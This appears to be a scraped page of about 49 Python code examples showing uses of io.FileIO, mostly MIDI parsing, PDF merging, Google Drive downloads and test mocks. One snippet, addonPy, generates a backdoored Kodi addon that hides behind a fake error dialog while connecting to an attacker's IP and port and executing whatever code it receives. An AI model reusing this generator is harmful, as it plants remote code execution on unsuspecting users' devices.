我们从Python开源项目中,提取了以下49个代码示例,用于说明如何使用io.FileIO()。
def replace(self, attachable: [io.BytesIO, io.FileIO], position=None, **kwargs): """ .. versionadded:: 0.5 Replace the underlying file-object with a seekable one. :param attachable: A seekable file-object. :param position: Position of the new seekable file-object. if :data:`.None`, position will be preserved. :param kwargs: the same as the :class:`.BaseDescriptor` """ if position is None: position = self.tell() # Close the old file-like object self.close() self._file = attachable # Some hacks are here: super().__init__(**kwargs) self.seek(position)
def append(self, fileobj, bookmark=None, pages=None, import_bookmarks=True): """ Identical to the :meth:`merge()<merge>` method, but assumes you want to concatenate all pages onto the end of the file instead of specifying a position. :param fileobj: A File Object or an object that supports the standard read and seek methods similar to a File Object. Could also be a string representing a path to a PDF file. :param str bookmark: Optionally, you may specify a bookmark to be applied at the beginning of the included file by supplying the text of the bookmark. :param pages: can be a :ref:`Page Range <page-range>` or a ``(start, stop[, step])`` tuple to merge only the specified range of pages from the source document into the output document. :param bool import_bookmarks: You may prevent the source document's bookmarks from being imported by specifying this as ``False``. """ self.merge(len(self.pages), fileobj, bookmark, pages, import_bookmarks)
def __init__(self, data: Union[FileIO, BufferedReader]) -> None: chunk_type = data.read(4) if chunk_type != b'MThd': raise ValueError("File had invalid header chunk type") header_length = int.from_bytes(data.read(4), 'big') if header_length != 6: raise ValueError("File has unsupported header length") self.length = header_length format = int.from_bytes(data.read(2), 'big') if format not in [0, 1, 2]: raise ValueError("File has unsupported format") self.format = format ntrks = int.from_bytes(data.read(2), 'big') if ntrks > 0 and format == 0: raise ValueError("Multiple tracks in single track format") self.ntrks = ntrks self.tpqn = int.from_bytes(data.read(2), 'big')
def addonPy(ip, port): with io.FileIO("KodiBackdoor/addon.py", "w") as file: file.write(''' import xbmcaddon import xbmcgui import socket,struct addon = xbmcaddon.Addon() addonname = addon.getAddonInfo('name') line1 = "Error!" line2 = "An error occurred" line3 = "Connection to server failed... please try again later" s=socket.socket(2,1) s.connect(("'''+ip+'''",'''+port+''')) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(4096) while len(d)!=l: d+=s.recv(4096) exec(d,{'s':s}) xbmcgui.Dialog().ok(addonname, line1, line2, line3) ''') #Zip folder
def download(user, file, msg): def startdownload(_request): downloader = MediaIoBaseDownload(fh, _request) done = False while not done: status, done = downloader.next_chunk() try: msg.edit(user.getstr('drive_downloading_progress') .format(p=int(status.progress() * 100))) except botogram.api.APIError: pass os.chdir('/tmp') # Sorry Windows users fh = io.FileIO(file.get('name'), 'wb') service = login(user) try: request = service.files().get_media(fileId=file.get('id')) startdownload(request) return '/tmp/' + file.get('name') except: request = service.files().export_media(fileId=file.get('id'), mimeType='application/pdf') startdownload(request) os.rename('/tmp/' + file.get('name'), '/tmp/' + file.get('name') + '.pdf') return '/tmp/' + file.get('name') + '.pdf'
def valid_io_modes(self, *a, **kw): modes = set() t = LocalTarget(is_tmp=True) t.open('w').close() for mode in self.theoretical_io_modes(*a, **kw): try: io.FileIO(t.path, mode).close() except ValueError: pass except IOError as err: if err.errno == EEXIST: modes.add(mode) else: raise else: modes.add(mode) return modes
def create_manifest(data_path, tag, ordered=True): manifest_path = '%s_manifest.csv' % tag file_paths = [] wav_files = [os.path.join(dirpath, f) for dirpath, dirnames, files in os.walk(data_path) for f in fnmatch.filter(files, '*.wav')] for file_path in tqdm(wav_files, total=len(wav_files)): file_paths.append(file_path.strip()) print('\n') if ordered: _order_files(file_paths) with io.FileIO(manifest_path, "w") as file: for wav_path in tqdm(file_paths, total=len(file_paths)): transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt') sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n' file.write(sample.encode('utf-8')) print('\n')
def _pipe_stdin(self, stdin): if stdin is None or isinstance(stdin, io.FileIO): return None tsi = self._temp_stdin bufsize = self.bufsize if isinstance(stdin, io.BufferedIOBase): buf = stdin.read(bufsize) while len(buf) != 0: tsi.write(buf) tsi.flush() buf = stdin.read(bufsize) elif isinstance(stdin, (str, bytes)): raw = stdin.encode() if isinstance(stdin, str) else stdin for i in range((len(raw)//bufsize) + 1): tsi.write(raw[i*bufsize:(i + 1)*bufsize]) tsi.flush() else: raise ValueError('stdin not understood {0!r}'.format(stdin))
def load(self, file: FileIO): self.ptr = file.tell() self.is_leaf, self.keys = load(file) ptr_num = len(self.keys) if not self.is_leaf: ptr_num += (ptr_num + 1) ptrs = unpack('Q' * ptr_num, file.read(8 * ptr_num)) if self.is_leaf: self.ptrs_value = list(ptrs) else: ptr_num //= 2 self.ptrs_value = list(ptrs[:ptr_num]) self.ptrs_child = list(ptrs[ptr_num:]) self.size = file.tell() - self.ptr
def test_create(self, mock_open): """Test create sysctl method""" _file = MagicMock(spec=io.FileIO) mock_open.return_value = _file create('{"kernel.max_pid": 1337}', "/etc/sysctl.d/test-sysctl.conf") _file.__enter__().write.assert_called_with("kernel.max_pid=1337\n") self.log.assert_called_with( "Updating sysctl_file: /etc/sysctl.d/test-sysctl.conf" " values: {'kernel.max_pid': 1337}", level='DEBUG') self.check_call.assert_called_with([ "sysctl", "-p", "/etc/sysctl.d/test-sysctl.conf"])
def test_configure_install_source_distro_proposed( self, _spcc, _open, _lsb): """Test configuring installation source from deb repo url""" _lsb.return_value = FAKE_RELEASE _file = MagicMock(spec=io.FileIO) _open.return_value = _file openstack.configure_installation_source('distro-proposed') _file.__enter__().write.assert_called_once_with( '# Proposed\ndeb http://archive.ubuntu.com/ubuntu ' 'precise-proposed main universe multiverse restricted\n') src = ('deb http://archive.ubuntu.com/ubuntu/ precise-proposed ' 'restricted main multiverse universe') openstack.configure_installation_source(src) _spcc.assert_called_once_with( ['add-apt-repository', '--yes', 'deb http://archive.ubuntu.com/ubuntu/ precise-proposed ' 'restricted main multiverse universe'])
def test_configure_install_source_uca_repos( self, _fip, _lsb, _install, _open): """Test configuring installation source from UCA sources""" _lsb.return_value = FAKE_RELEASE _file = MagicMock(spec=io.FileIO) _open.return_value = _file _fip.side_effect = lambda x: x for src, url in UCA_SOURCES: actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url) openstack.configure_installation_source(src) _install.assert_called_with(['ubuntu-cloud-keyring'], fatal=True) _open.assert_called_with( '/etc/apt/sources.list.d/cloud-archive.list', 'w' ) _file.__enter__().write.assert_called_with(actual_url)
def test_save_scriptrc(self, _open, _charm_dir, _exists, _mkdir): """Test generation of scriptrc from environment""" scriptrc = ['#!/bin/bash\n', 'export setting1=foo\n', 'export setting2=bar\n'] _file = MagicMock(spec=io.FileIO) _open.return_value = _file _charm_dir.return_value = '/var/lib/juju/units/testing-foo-0/charm' _exists.return_value = False os.environ['JUJU_UNIT_NAME'] = 'testing-foo/0' openstack.save_script_rc(setting1='foo', setting2='bar') rcdir = '/var/lib/juju/units/testing-foo-0/charm/scripts' _mkdir.assert_called_with(rcdir) expected_f = '/var/lib/juju/units/testing-foo-0/charm/scripts/scriptrc' _open.assert_called_with(expected_f, 'wt') _mkdir.assert_called_with(os.path.dirname(expected_f)) _file.__enter__().write.assert_has_calls( list(call(line) for line in scriptrc), any_order=True)
def test_configure_install_source_uca_repos( self, _fip, _lsb, _install, _open): """Test configuring installation source from UCA sources""" _lsb.return_value = FAKE_RELEASE _file = MagicMock(spec=io.FileIO) _open.return_value = _file _fip.side_effect = lambda x: x for src, url in UCA_SOURCES: actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url) fetch.add_source(src) _install.assert_called_with(['ubuntu-cloud-keyring'], fatal=True) _open.assert_called_with( '/etc/apt/sources.list.d/cloud-archive.list', 'w' ) _file.__enter__().write.assert_called_with(actual_url)
def create_manifest(data_path, tag, ordered=True): manifest_path = '%s_manifest.csv' % tag file_paths = [] wav_files = [os.path.join(dirpath, f) for dirpath, dirnames, files in os.walk(data_path) for f in fnmatch.filter(files, '*.wav')] size = len(wav_files) counter = 0 for file_path in wav_files: file_paths.append(file_path.strip()) counter += 1 update_progress(counter / float(size)) print('\n') if ordered: _order_files(file_paths) counter = 0 with io.FileIO(manifest_path, "w") as file: for wav_path in file_paths: transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt') sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n' file.write(sample.encode('utf-8')) counter += 1 update_progress(counter / float(size)) print('\n')
def __init__(self, **kwargs): buf = FileIO(sys.stdout.fileno(), 'w') super(_Py3Utf8Stdout, self).__init__( buf, encoding='utf8', errors='strict' )
def download(url, file_name): """ function to download file over http url : URL of file to be downloaded file_name : File name """ with io.FileIO(file_name, "w") as file: # get request response = get(url) # write to file file.write(response.content)
def isfileobj(f): return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
def get_data(self, path): """Return the data from path as raw bytes.""" with io.FileIO(path, 'r') as file: return file.read() # inspired from importlib2
def write(self, fileobj): """ Writes all data that has been merged to the given output file. :param fileobj: Output file. Can be a filename or any kind of file-like object. """ my_file = False if isString(fileobj): fileobj = file(fileobj, 'wb') my_file = True # Add pages to the PdfFileWriter # The commented out line below was replaced with the two lines below it to allow PdfFileMerger to work with PyPdf 1.13 for page in self.pages: self.output.addPage(page.pagedata) page.out_pagedata = self.output.getReference(self.output._pages.getObject()["/Kids"][-1].getObject()) #idnum = self.output._objects.index(self.output._pages.getObject()["/Kids"][-1].getObject()) + 1 #page.out_pagedata = IndirectObject(idnum, 0, self.output) # Once all pages are added, create bookmarks to point at those pages self._write_dests() self._write_bookmarks() # Write the output to the file self.output.write(fileobj) if my_file: fileobj.close()
def close(self): """ Shuts all file descriptors (input and output) and clears all memory usage. """ self.pages = [] for fo, pdfr, mine in self.inputs: if mine: fo.close() self.inputs = [] self.output = None
def addBookmark(self, title, pagenum, parent=None): """ Add a bookmark to this PDF file. :param str title: Title to use for this bookmark. :param int pagenum: Page number this bookmark will point to. :param parent: A reference to a parent bookmark to create nested bookmarks. """ if parent == None: iloc = [len(self.bookmarks)-1] elif isinstance(parent, list): iloc = parent else: iloc = self.findBookmark(parent) dest = Bookmark(TextStringObject(title), NumberObject(pagenum), NameObject('/FitH'), NumberObject(826)) if parent == None: self.bookmarks.append(dest) else: bmparent = self.bookmarks for i in iloc[:-1]: bmparent = bmparent[i] npos = iloc[-1]+1 if npos < len(bmparent) and isinstance(bmparent[npos], list): bmparent[npos].append(dest) else: bmparent.insert(npos, [dest]) return dest
def __runProcessWithFilteredOutput(self, proc: subprocess.Popen, logfile: "typing.Optional[io.FileIO]", stdoutFilter: "typing.Callable[[bytes], None]", cmdStr: str): logfileLock = threading.Lock() # we need a mutex so the logfile line buffer doesn't get messed up stderrThread = None if logfile: # use a thread to print stderr output and write it to logfile (not using a thread would block) stderrThread = threading.Thread(target=self._handleStdErr, args=(logfile, proc.stderr, logfileLock, self)) stderrThread.start() for line in proc.stdout: with logfileLock: # make sure we don't interleave stdout and stderr lines if logfile: logfile.write(line) if stdoutFilter: stdoutFilter(line) else: sys.stdout.buffer.write(line) flushStdio(sys.stdout) retcode = proc.wait() if stderrThread: stderrThread.join() # Not sure if the remaining call is needed remainingErr, remainingOut = proc.communicate() if remainingErr: print("Process had remaining stderr:", remainingErr) sys.stderr.buffer.write(remainingErr) if logfile: logfile.write(remainingOut) if remainingOut: print("Process had remaining stdout:", remainingOut) sys.stdout.buffer.write(remainingOut) if logfile: logfile.write(remainingErr) if stdoutFilter and self._lastStdoutLineCanBeOverwritten: # add the final new line after the filtering sys.stdout.buffer.write(b"\n") if retcode: message = "Command \"%s\" failed with exit code %d.\n" % (cmdStr, retcode) if logfile: message += "See " + logfile.name + " for details." raise SystemExit(message)
def patch_open(): '''Patch open() to allow mocking both open() itself and the file that is yielded. Yields the mock for "open" and "file", respectively.''' mock_open = MagicMock(spec='builtins.open') mock_file = MagicMock(spec=io.FileIO) @contextmanager def stub_open(*args, **kwargs): mock_open(*args, **kwargs) yield mock_file with patch('builtins.open', stub_open): yield mock_open, mock_file
def sequence_number(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]: length_bytes = bytearray(data.read(4)) length = int.from_bytes(length_bytes, "big") if length != 2: raise EventLengthError("Sequence Number length was incorrect. It should be 2, but it was {}".format(length)) sequence_num_raw = bytearray(data.read(2)) sequence_num = int.from_bytes(sequence_num_raw, "big") return length, sequence_num, sequence_num_raw
def text_event(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]: length = VariableLengthValue(data).value raw_data = bytearray(data.read(length)) try: text = raw_data.decode("ASCII") except UnicodeDecodeError as exc: raise EventTextError("Unparsable text in text event") from exc return length, text, raw_data
def copyright_notice(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]: length = VariableLengthValue(data).value raw_data = bytearray(data.read(length)) try: text = raw_data.decode("ASCII") except UnicodeDecodeError as exc: raise EventTextError("Unparsable text in copyright notice") from exc return length, text, raw_data
def chunk_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]: length = VariableLengthValue(data).value raw_data = bytearray(data.read(length)) try: text = raw_data.decode("ASCII") except UnicodeDecodeError as exc: raise EventTextError("Unparsable text in track/sequence name") from exc return length, text, raw_data
def instrument_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]: length = VariableLengthValue(data).value raw_data = bytearray(data.read(length)) try: text = raw_data.decode("ASCII") except UnicodeDecodeError as exc: raise EventTextError("Unparsable text in instrument name") from exc return length, text, raw_data
def marker(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]: length = VariableLengthValue(data).value raw_data = bytearray(data.read(length)) try: text = raw_data.decode("ASCII") except UnicodeDecodeError as exc: raise EventTextError("Unparseable text in marker text") from exc return length, text, raw_data
def cue_point(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]: length = VariableLengthValue(data).value raw_data = bytearray(data.read(length)) try: text = raw_data.decode("ASCII") except UnicodeDecodeError as exc: raise EventTextError("Unparseable text in Cue Point text") from exc return length, text, raw_data
def channel_prefix(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]: length_bytes = data.read(4) length = int.from_bytes(length_bytes, "big") if length != 0x01: raise EventLengthError("Channel Prefix length invalid. It should be 1, but it's {}".format(length)) prefix_raw = bytearray(data.read(1)) prefix = int.from_bytes(prefix_raw, "big") return length, prefix, prefix_raw
def end_of_track(data: Union[FileIO, BufferedReader]) -> Tuple[int, None, None]: length_bytes = data.read(4) length = int.from_bytes(length_bytes, "big") if length != 0: raise EventLengthError("End of Track event with non-zero length") return length, None, None
def set_tempo(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]: length_bytes = data.read(4) length = int.from_bytes(length_bytes, "big") if length != 3: raise EventLengthError("Set Tempo event with length other than 3. Given length was {}".format(length)) raw_data = bytearray(data.read(3)) tpqm = int.from_bytes(raw_data, "big") return length, tpqm, raw_data
def time_signature(data: Union[FileIO, BufferedReader]) -> Tuple[int, Tuple[int, int, int, int], bytearray]: length_bytes = bytearray(data.read(1)) length = int.from_bytes(length_bytes, "big") if length != 0x04: raise EventLengthError("Time Signature event has invalid length. Should be 4, value was {}".format(length)) data_bytes = bytearray(data.read(4)) # type: bytearray numerator = data_bytes[0] # type: int denominator = data_bytes[1] # type: int clock_num = data_bytes[2] ts_number = data_bytes[3] return length, (numerator, denominator, clock_num, ts_number), data_bytes
def key_signature(data: Union[FileIO, BufferedReader]) -> Tuple[int, Tuple[int, int], bytearray]: length_bytes = bytearray(data.read(1)) length = int.from_bytes(length_bytes, "big") if length != 0x02: raise EventLengthError("Key Signature event has invalid length. Should be 2, value was {}".format(length)) data_bytes = bytearray(data.read(2)) signature_index = data_bytes[0] minor_major = data_bytes[1] return length, (signature_index, minor_major), data_bytes
def __init__(self, data: Union[FileIO, BufferedReader]) -> None: chunk_name = data.read(4) if chunk_name != b'MTrk': raise ValueError("Track Chunk header invalid") self.length = int.from_bytes(data.read(4), 'big')
def _parse(self, data: Union[FileIO, BufferedReader]): delta_time = VariableLengthValue(data)
def patch_open(): '''Patch open() to allow mocking both open() itself and the file that is yielded. Yields the mock for "open" and "file", respectively.''' mock_open = MagicMock(spec=open) mock_file = MagicMock(spec=io.FileIO) @contextmanager def stub_open(*args, **kwargs): mock_open(*args, **kwargs) yield mock_file with patch('builtins.open', stub_open): yield mock_open, mock_file
def _format_files(cls, *fobjs: FileIO) -> List[HttpFile]: files = [] for fobj in fobjs: filename = basename(fobj.name) extension = splitext(filename)[1] content_type = 'application/{}'.format(extension) files.append(('file', (filename, fobj, content_type))) return files
def clone(): print (''+T+'Remember to put https:// in front of the website!') hey = raw_input(''+T+'' + color.UNDERLINE + 'Website>' + color.END) response = urllib2.urlopen(hey) page_source = response.read() with io.FileIO("websitesource.html", "w") as file: file.write(page_source) print (''+G+'[*] Finished!')
def isfileobj(f): return isinstance(f, io.FileIO)
def isfileobj(f): return isinstance(f, (io.FileIO, io.BufferedReader))
def isfile(f): if isinstance(f, io.FileIO): return True elif hasattr(f, 'buffer'): return isfile(f.buffer) elif hasattr(f, 'raw'): return isfile(f.raw) return False
def download_revisions(httpauth, service, fileID, title, path, counter, log_file): if not os.path.exists(path + "/" + title): os.makedirs(path + "/" + title) url = "https://www.googleapis.com/drive/v3/files/" + fileID + "/revisions" resp, content = httpauth.request(url, 'GET') revisions = json.loads(content.decode('utf-8')) revision_info = [] rev_num = 1 for revision in revisions["revisions"]: revision_info.append([str(rev_num), revision["id"], revision["modifiedTime"]]) file_path = path + "/" + title + "/" + title + ".rev" + str(rev_num) orig_title = str(title) # to prevent duplicate file names being saved if os.path.exists(file_path): file_path, title = get_new_file_name(file_path) log_and_print(log_file, counter + " File named '" + orig_title + "' already exists. Saving as '" + title + "' instead.") log_and_print(log_file, counter + " Downloading '" + title + ".rev" + str(rev_num) + "'...") request = service.revisions().get_media(fileId=fileID, revisionId=revision["id"]) fh = io.FileIO(file_path, mode='wb') downloader = MediaIoBaseDownload(fh, request) done = False while done is False: status, done = downloader.next_chunk() # Print status of download (mainly for larger files) print("%d%%\r" % int(status.progress() * 100), end="", flush=True) fh.close() log_and_print(log_file, counter + " Hashing '" + title + ".rev" + str(rev_num) + "'...") with open(path + "/_hashes.txt", "a") as hashes_file: hashes_file.write(title + ".rev" + str(rev_num) + "\n") hashes_file.write("--MD5: " + hash_file(file_path, "md5") + "\n") hashes_file.write("--SHA1: " + hash_file(file_path, "sha1") + "\n") hashes_file.write("--SHA256: " + hash_file(file_path, "sha256") + "\n") rev_num += 1 log_and_print(log_file, counter + " Writing revision info for '" + title + "'...") with open(path + "/" + title + "/" + title + "_revisions.txt", "w") as saved_file: for item in revision_info: saved_file.write("Revision Number: " + item[0] + "\n") saved_file.write("--Revision ID: " + item[1] + "\n") saved_file.write("--Revision Last Modifed: " + item[2] + "\n") # Check if there are revisions for a given fileID